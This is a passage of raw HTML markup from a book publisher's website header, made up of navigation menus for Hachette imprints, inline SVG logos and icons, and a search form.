Nav" data-label="Timber Press">Timber Press</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.storey.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Storey Publishing">Storey Publishing</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Perseus">Perseus</a><span id="expand-site-header__sub-menu-1627861462" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1627861462" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1627861462" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3269677249  desc-arrow-14363308">
	<title id="titlet-arrow-3269677249">Arrow Icon</title>
	<desc id="desc-arrow-14363308">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1627861462" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1627861462"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/avalon-travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Avalon Travel">Avalon Travel</a><span id="expand-site-header__sub-menu-1264315507" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1264315507" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1264315507" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-213961631  desc-arrow-3523331150">
	<title id="titlet-arrow-213961631">Arrow Icon</title>
	<desc id="desc-arrow-3523331150">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/basic-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Basic Books">Basic Books</a><span id="expand-site-header__sub-menu-506014389" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-506014389" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-506014389" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1218817518  desc-arrow-2366090145">
	<title id="titlet-arrow-1218817518">Arrow Icon</title>
	<desc id="desc-arrow-2366090145">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/hachette-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Books">Hachette Books</a><span id="expand-site-header__sub-menu-559929140" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-559929140" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-559929140" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3907310900  desc-arrow-824126212">
	<title id="titlet-arrow-3907310900">Arrow Icon</title>
	<desc id="desc-arrow-824126212">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/publicaffairs/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="PublicAffairs">PublicAffairs</a><span id="expand-site-header__sub-menu-370659574" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-370659574" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-370659574" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2357672030  desc-arrow-1924416865">
	<title id="titlet-arrow-2357672030">Arrow Icon</title>
	<desc id="desc-arrow-1924416865">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/running-press/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Running Press">Running Press</a><span id="expand-site-header__sub-menu-985862884" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-985862884" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-985862884" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2974854573  desc-arrow-2554667319">
	<title id="titlet-arrow-2974854573">Arrow Icon</title>
	<desc id="desc-arrow-2554667319">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li>	</ul>
</li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/video/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Videos">Videos</a><span id="expand-site-header__sub-menu-371924212" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-371924212" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-371924212" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3993643004  desc-arrow-1553667506">
	<title id="titlet-arrow-3993643004">Arrow Icon</title>
	<desc id="desc-arrow-1553667506">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-371924212" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-371924212"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/author-inquiry/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Author Inquiry">Author Inquiry</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/book-trailers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Trailers">Book Trailers</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/the-current/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="The Current">The Current</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/meet-the-author-video/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Meet the Author">Meet the Author</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/wordsmithing/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Wordsmithing">Wordsmithing</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/bold-recommendations/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Bold Recommendations">Bold Recommendations</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/book-your-next-romance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Your Next Romance">Book Your Next Romance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/shelf-life/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Shelf Life">Shelf Life</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/hbg-films/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="HBG Films">HBG Films</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/recommendations-from-the-african-diaspora/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Recommendations from the African Diaspora">Recommendations from the African Diaspora</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/blogs-hub" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Blogs">Blogs</a><span id="expand-site-header__sub-menu-681366830" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-681366830" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-681366830" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2309034768  desc-arrow-1194530746">
	<title id="titlet-arrow-2309034768">Arrow Icon</title>
	<desc id="desc-arrow-1194530746">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-681366830" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-681366830"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.novelsuspects.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Novel Suspects">Novel Suspects</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/the-current/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="The Current">The Current</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/open-book/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Open Book">Open Book</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/bookmark/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Bookmark Book Club">Bookmark Book Club</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/about-hachette-book-group-2/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About">About</a><span id="expand-site-header__sub-menu-116314677" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-116314677" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-116314677" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1154971856  desc-arrow-4084537914">
	<title id="titlet-arrow-1154971856">Arrow Icon</title>
	<desc id="desc-arrow-4084537914">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-116314677" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-116314677"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/about-hachette-book-group-2/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About Hachette Book Group">About Hachette Book Group</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/about/careers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Careers">Careers</a></span></li></ul>
</li></ul></div>	</nav>
</header>

<header id="site-header" class="site-header imprint-header grand-central-publishing ">
	<a href="#content" class="skiplink">Skip to Main Content</a>
	
<div class="site-header__top site-header__default" data-toggle-element="site-header__search">
	<div class="site-header__mobile-menu-toggle">
		<button class="site-header__hamburger toggleable" data-toggle-target="site-header__mobile-menu" data-toggle-block="site-header__mobile-menu">&#9776;</button>
	</div>

	<h2 class="site-header__branding">
		
	<a class="site-header__branding--imprint-header-logo__desktop" href="https://www.grandcentralpublishing.com/">
		<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 288 98.1"><defs><style>.cls-1{fill:#ef4529;}</style></defs><title>grand-central-publishing</title><path class="cls-1" d="M69.59,3.61c-6,.29-12.32,1.91-12.25,8.43s6.8,8.57,13.1,8.5c5-.07,10.77-1.35,11.83-4.11H73.91V12H94.52v4.11H86.8v8.07H82.41V21.46c-3.4,1.84-5.81,2.83-13,2.9-8.22,0-17.14-4.32-17.07-12.53S61.66,0,70,0A26.17,26.17,0,0,1,82.34,2.69V.28h4.18V9.21h-3.9C81.14,5.38,75.12,3.4,69.59,3.61ZM69,42.28c-5.87-.07-12.46,2.34-12.32,8.79.21,6,7.44,8.28,13.46,8.21,6.3-.14,11-1.49,12.6-6.66h3.69c-.14,7.09-8,10.7-16.36,10.63-8.57-.07-18.21-3.68-18.28-12.33C51.6,42.64,60.24,38.53,69,38.67c5.81.07,7.58.78,12.61,3.19V39h4.82v8.93H81.92C80.36,44.48,76.39,42.43,69,42.28ZM46.15,29.39H86.66V33.5H46.15ZM.11,77.27a5.14,5.14,0,0,1,5.1-5.17h.14a5.63,5.63,0,0,1,4,1.42L7.9,75.22a3.31,3.31,0,0,0-2.62-1,3.16,3.16,0,0,0-.07,6.3h.21A4,4,0,0,0,7.48,80V78.55H5.28V76.63H9.67v4.25a6.32,6.32,0,0,1-4.32,1.56A5,5,0,0,1,.11,77.63Zm14.17-5.1h4.6a4,4,0,0,1,2.9,1,3,3,0,0,1,.85,2.27,3.08,3.08,0,0,1-2.12,3.12L23,82.16H20.44L18.31,79h-1.7v3.26H14.28Zm4.39,4.89c1.06,0,1.7-.57,1.7-1.42s-.64-1.41-1.7-1.41h-2.2v2.9Zm11.68-5h2.06l4.32,10.13H34.39L33.47,80H29.22l-.92,2.27H26Zm2.34,6-1.34-3.26L30,78.05Zm7.65-5.88h2l4.68,6.16V72.17h2.19V82.23H47.42l-4.88-6.37v6.37h-2.2Zm13.81,0h3.9c3.18,0,5.31,2.13,5.31,5a5,5,0,0,1-5.31,5h-3.9Zm3.9,8.08a2.85,2.85,0,0,0,3-2.62v-.36a2.91,2.91,0,0,0-2.76-3h-2v6ZM72.42,77a5,5,0,0,1,5-5.17h.22a5.2,5.2,0,0,1,4,1.56L80.22,75a3.44,3.44,0,0,0-2.55-1.14,3,3,0,0,0-2.91,3V77a3,3,0,0,0,2.83,3.11h.08a3.4,3.4,0,0,0,2.62-1.2l1.41,1.42a5.06,5.06,0,0,1-4.11,1.77,5.12,5.12,0,0,1-5.17-5Zm13.18-5.1h7.58v2H87.79v2h4.75v2H87.79V80h5.46v2H85.6V71.89Zm12.39,0h2.06l4.74,6.16V71.89H107V82h-1.84l-4.89-6.38V82h-2.2L98,71.89Zm15.94,2h-3.05V71.82h8.29v2.05h-3v8h-2.19v-8Zm9.28-2h4.6a3.92,3.92,0,0,1,2.9,1,3,3,0,0,1,.85,2.27,3,3,0,0,1-2.12,3.11l2.48,3.62h-2.55l-2.13-3.19h-1.77v3.19h-2.19l-.07-10Zm4.39,4.82c1.06,0,1.7-.57,1.7-1.42s-.64-1.42-1.77-1.42h-2.2v2.91l2.27-.07Zm11.61-4.82h2.06L145.59,82h-2.34l-.92-2.27h-4.25L137.16,82h-2.27Zm2.34,5.88-1.34-3.26-1.35,3.26Zm7.23-5.88H151v8h5v2h-7.22v-10ZM29.5,89.17h3a2.53,2.53,0,0,1,2.83,2.55c0,1.7-1.34,2.62-3,2.62H31.2v2.2H29.57V89.17Zm2.91,3.75a1.12,1.12,0,0,0,1.27-1v-.14c0-.71-.49-1.13-1.34-1.13H31.06v2.26Zm5.81.5V89.17h1.62v4.18c0,1.2.64,1.84,1.63,1.84s1.63-.57,1.63-1.77V89.17h1.63v4.18a3,3,0,0,1-3.26,3.33,2.94,2.94,0,0,1-3.25-3.26Zm9.84-4.25h3.47a2.59,2.59,0,0,1,1.91.64,1.46,1.46,0,0,1,.5,1.27,1.73,1.73,0,0,1-1,1.63,1.88,1.88,0,0,1,1.41,1.84c0,1.35-1.13,2.06-2.76,2.06H48.06Zm3.12,3c.7,0,1.2-.22,1.2-.78s-.35-.78-1.06-.78H49.69v1.56Zm.42,3c.71,0,1.13-.21,1.13-.85s-.35-.78-1.2-.78H49.69v1.63Zm5.95-6h1.63v6h3.75v1.49H57.62Zm8.64,0h1.63v7.44H66.19Zm5,6.52,1-1.21a3.24,3.24,0,0,0,2.2.92c.63,0,1.06-.28,1.06-.7s-.28-.64-1.49-.93c-1.49-.35-2.48-.77-2.48-2.26a2.34,2.34,0,0,1,2.62-2.27,4.84,4.84,0,0,1,2.77.92L76,91.37a3.69,3.69,0,0,0-1.92-.71c-.63,0-.92.28-.92.64s.29.63,1.63,1,2.34.92,2.34,2.19c0,1.49-1.13,2.34-2.76,2.34A4.32,4.32,0,0,1,71.15,95.69Zm9.28-6.52h1.63v2.9h3v-3h1.63v7.51H85.1v-3h-3v3H80.43Zm9.7,0h1.63v7.44H90.13Zm5.45,0h1.49l3.47,4.6v-4.6h1.63v7.44h-1.41l-3.62-4.75v4.75H95.51Zm9.57,3.9a3.79,3.79,0,0,1,3.75-3.83H109A3.74,3.74,0,0,1,112,90.3l-1,1.21a2.44,2.44,0,0,0-2-.71,2.35,2.35,0,0,0,0,4.67h.14a3,3,0,0,0,1.56-.42V94H109V92.57h3.26v3.26a4.68,4.68,0,0,1-3.19,1.2,3.67,3.67,0,0,1-3.89-3.54A1.5,1.5,0,0,1,105.15,93.07Z"/></svg>
	</a>
	<a class="site-header__branding--imprint-header-logo__mobile" href="https://www.grandcentralpublishing.com/">
		<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 288 98.1"><defs><style>.gcpmobile-cls-1{fill:#FFFFFF;}</style></defs><title>grand-central-publishing</title><path class="gcpmobile-cls-1" d="M69.59,3.61c-6,.29-12.32,1.91-12.25,8.43s6.8,8.57,13.1,8.5c5-.07,10.77-1.35,11.83-4.11H73.91V12H94.52v4.11H86.8v8.07H82.41V21.46c-3.4,1.84-5.81,2.83-13,2.9-8.22,0-17.14-4.32-17.07-12.53S61.66,0,70,0A26.17,26.17,0,0,1,82.34,2.69V.28h4.18V9.21h-3.9C81.14,5.38,75.12,3.4,69.59,3.61ZM69,42.28c-5.87-.07-12.46,2.34-12.32,8.79.21,6,7.44,8.28,13.46,8.21,6.3-.14,11-1.49,12.6-6.66h3.69c-.14,7.09-8,10.7-16.36,10.63-8.57-.07-18.21-3.68-18.28-12.33C51.6,42.64,60.24,38.53,69,38.67c5.81.07,7.58.78,12.61,3.19V39h4.82v8.93H81.92C80.36,44.48,76.39,42.43,69,42.28ZM46.15,29.39H86.66V33.5H46.15ZM.11,77.27a5.14,5.14,0,0,1,5.1-5.17h.14a5.63,5.63,0,0,1,4,1.42L7.9,75.22a3.31,3.31,0,0,0-2.62-1,3.16,3.16,0,0,0-.07,6.3h.21A4,4,0,0,0,7.48,80V78.55H5.28V76.63H9.67v4.25a6.32,6.32,0,0,1-4.32,1.56A5,5,0,0,1,.11,77.63Zm14.17-5.1h4.6a4,4,0,0,1,2.9,1,3,3,0,0,1,.85,2.27,3.08,3.08,0,0,1-2.12,3.12L23,82.16H20.44L18.31,79h-1.7v3.26H14.28Zm4.39,4.89c1.06,0,1.7-.57,1.7-1.42s-.64-1.41-1.7-1.41h-2.2v2.9Zm11.68-5h2.06l4.32,10.13H34.39L33.47,80H29.22l-.92,2.27H26Zm2.34,6-1.34-3.26L30,78.05Zm7.65-5.88h2l4.68,6.16V72.17h2.19V82.23H47.42l-4.88-6.37v6.37h-2.2Zm13.81,0h3.9c3.18,0,5.31,2.13,5.31,5a5,5,0,0,1-5.31,5h-3.9Zm3.9,8.08a2.85,2.85,0,0,0,3-2.62v-.36a2.91,2.91,0,0,0-2.76-3h-2v6ZM72.42,77a5,5,0,0,1,5-5.17h.22a5.2,5.2,0,0,1,4,1.56L80.22,75a3.44,3.44,0,0,0-2.55-1.14,3,3,0,0,0-2.91,3V77a3,3,0,0,0,2.83,3.11h.08a3.4,3.4,0,0,0,2.62-1.2l1.41,1.42a5.06,5.06,0,0,1-4.11,1.77,5.12,5.12,0,0,1-5.17-5Zm13.18-5.1h7.58v2H87.79v2h4.75v2H87.79V80h5.46v2H85.6V71.89Zm12.39,0h2.06l4.74,6.16V71.89H107V82h-1.84l-4.89-6.38V82h-2.2L98,71.89Zm15.94,2h-3.05V71.82h8.29v2.05h-3v8h-2.19v-8Zm9.28-2h4.6a3.92,3.92,0,0,1,2.9,1,3,3,0,0,1,.85,2.27,3,3,0,0,1-2.12,3.11l2.48,3.62h-2.55l-2.13-3.19h-1.77v3.19h-2.19l-.07-10Zm4.39,4.82c1.06,0,1.7-.57,1.7-1.42s-.64-1.42-1.77-1.42h-2.2v2.91l2.27-.07Zm11.61-4.82h2.06L145.59,82h-2.34l-.92-2.27h-4.25L137.16,82h-2.27Zm2.34,5.88-1.34-3.26-1.35,3.26Zm7.23-5.88H151v8h5v2h-7.22v-10ZM29.5,89.17h3a2.53,2.53,0,0,1,2.83,2.55c0,1.7-1.34,2.62-3,2.62H31.2v2.2H29.57V89.17Zm2.91,3.75a1.12,1.12,0,0,0,1.27-1v-.14c0-.71-.49-1.13-1.34-1.13H31.06v2.26Zm5.81.5V89.17h1.62v4.18c0,1.2.64,1.84,1.63,1.84s1.63-.57,1.63-1.77V89.17h1.63v4.18a3,3,0,0,1-3.26,3.33,2.94,2.94,0,0,1-3.25-3.26Zm9.84-4.25h3.47a2.59,2.59,0,0,1,1.91.64,1.46,1.46,0,0,1,.5,1.27,1.73,1.73,0,0,1-1,1.63,1.88,1.88,0,0,1,1.41,1.84c0,1.35-1.13,2.06-2.76,2.06H48.06Zm3.12,3c.7,0,1.2-.22,1.2-.78s-.35-.78-1.06-.78H49.69v1.56Zm.42,3c.71,0,1.13-.21,1.13-.85s-.35-.78-1.2-.78H49.69v1.63Zm5.95-6h1.63v6h3.75v1.49H57.62Zm8.64,0h1.63v7.44H66.19Zm5,6.52,1-1.21a3.24,3.24,0,0,0,2.2.92c.63,0,1.06-.28,1.06-.7s-.28-.64-1.49-.93c-1.49-.35-2.48-.77-2.48-2.26a2.34,2.34,0,0,1,2.62-2.27,4.84,4.84,0,0,1,2.77.92L76,91.37a3.69,3.69,0,0,0-1.92-.71c-.63,0-.92.28-.92.64s.29.63,1.63,1,2.34.92,2.34,2.19c0,1.49-1.13,2.34-2.76,2.34A4.32,4.32,0,0,1,71.15,95.69Zm9.28-6.52h1.63v2.9h3v-3h1.63v7.51H85.1v-3h-3v3H80.43Zm9.7,0h1.63v7.44H90.13Zm5.45,0h1.49l3.47,4.6v-4.6h1.63v7.44h-1.41l-3.62-4.75v4.75H95.51Zm9.57,3.9a3.79,3.79,0,0,1,3.75-3.83H109A3.74,3.74,0,0,1,112,90.3l-1,1.21a2.44,2.44,0,0,0-2-.71,2.35,2.35,0,0,0,0,4.67h.14a3,3,0,0,0,1.56-.42V94H109V92.57h3.26v3.26a4.68,4.68,0,0,1-3.19,1.2,3.67,3.67,0,0,1-3.89-3.54A1.5,1.5,0,0,1,105.15,93.07Z"/></svg>
	</a>
	<meta itemprop="publisher" content="Grand Central Publishing" />
		</h2>

	<ul class="site-header__social">
		<li class="site-header__social-header">
			<a href="https://www.hachettebookgroup.com/newsletters/">Newsletter</a>
		</li>
		<li class="site-header__social-list-item">
			<a href="/preferences" aria-label="Preferences"><div class="header-button">
<svg xmlns="http://www.w3.org/2000/svg" style="width: 100%; height: 100%;" viewBox="0 0 512 512"><!--! Font Awesome Pro 6.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2022 Fonticons, Inc. --><path d="M495.9 166.6C499.2 175.2 496.4 184.9 489.6 191.2L446.3 230.6C447.4 238.9 448 247.4 448 256C448 264.6 447.4 273.1 446.3 281.4L489.6 320.8C496.4 327.1 499.2 336.8 495.9 345.4C491.5 357.3 486.2 368.8 480.2 379.7L475.5 387.8C468.9 398.8 461.5 409.2 453.4 419.1C447.4 426.2 437.7 428.7 428.9 425.9L373.2 408.1C359.8 418.4 344.1 427 329.2 433.6L316.7 490.7C314.7 499.7 307.7 506.1 298.5 508.5C284.7 510.8 270.5 512 255.1 512C241.5 512 227.3 510.8 213.5 508.5C204.3 506.1 197.3 499.7 195.3 490.7L182.8 433.6C167 427 152.2 418.4 138.8 408.1L83.14 425.9C74.3 428.7 64.55 426.2 58.63 419.1C50.52 409.2 43.12 398.8 36.52 387.8L31.84 379.7C25.77 368.8 20.49 357.3 16.06 345.4C12.82 336.8 15.55 327.1 22.41 320.8L65.67 281.4C64.57 273.1 64 264.6 64 256C64 247.4 64.57 238.9 65.67 230.6L22.41 191.2C15.55 184.9 12.82 175.3 16.06 166.6C20.49 154.7 25.78 143.2 31.84 132.3L36.51 124.2C43.12 113.2 50.52 102.8 58.63 92.95C64.55 85.8 74.3 83.32 83.14 86.14L138.8 103.9C152.2 93.56 167 84.96 182.8 78.43L195.3 21.33C197.3 12.25 204.3 5.04 213.5 3.51C227.3 1.201 241.5 0 256 0C270.5 0 284.7 1.201 298.5 3.51C307.7 5.04 314.7 12.25 316.7 21.33L329.2 78.43C344.1 84.96 359.8 93.56 373.2 103.9L428.9 86.14C437.7 83.32 447.4 85.8 453.4 92.95C461.5 102.8 468.9 113.2 475.5 124.2L480.2 132.3C486.2 143.2 491.5 154.7 495.9 166.6V166.6zM256 336C300.2 336 336 300.2 336 255.1C336 211.8 300.2 175.1 256 175.1C211.8 175.1 176 211.8 176 255.1C176 300.2 211.8 336 256 336z"/></svg>
</div></a>
		</li>
			</ul>
	<div class="mobile-search">
		
<div class="site-search">
	<form id="global-hbg-search" class="site-search__form" name="search-form" action="https://www.grandcentralpublishing.com/">
		<label class="site-search__label" for="search-form-6361c4e1b3b2b">Search</label>
		<span class="site-search_background"></span>
		<input class="site-search__input" type="search" id="search-form-6361c4e1b3b2b" value="" placeholder="Search" name="s" alt="search input field">
		<button class="site-search__button" aria-label="Search">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.68 38.68" role="img" aria-labelledby="title-search-icon-1440070117  desc-search-icon-2414237630">
	<title id="title-search-icon-1440070117">Search</title>
	<desc id="desc-search-icon-2414237630">magnifying glass graphic</desc>
	<path d="M37.62,32.49,27,21.86A14.54,14.54,0,1,0,21.86,27L32.49,37.62a3.63,3.63,0,1,0,5.13-5.13ZM14.5,25.38A10.88,10.88,0,1,1,25.38,14.5,10.88,10.88,0,0,1,14.5,25.38Z"/></svg>
		</button>
	</form>
</div>
	</div>
</div>
<div class="site-header__default site-header__nav-search-container">
	<div class="menu-grand-central-publishing-container"><nav class="site-header__nav"><ul id="menu-grand-central-publishing" class="menu site-header__menu" data-toggle-element="site-header__mobile-menu"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/page/about-gcp/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About GCP">About GCP</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/landing-page/meet-gcp/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Meet GCP">Meet GCP</a></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="#" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Imprints">Imprints</a><span id="expand-site-header__sub-menu-1659823226" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1659823226" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1659823226" >
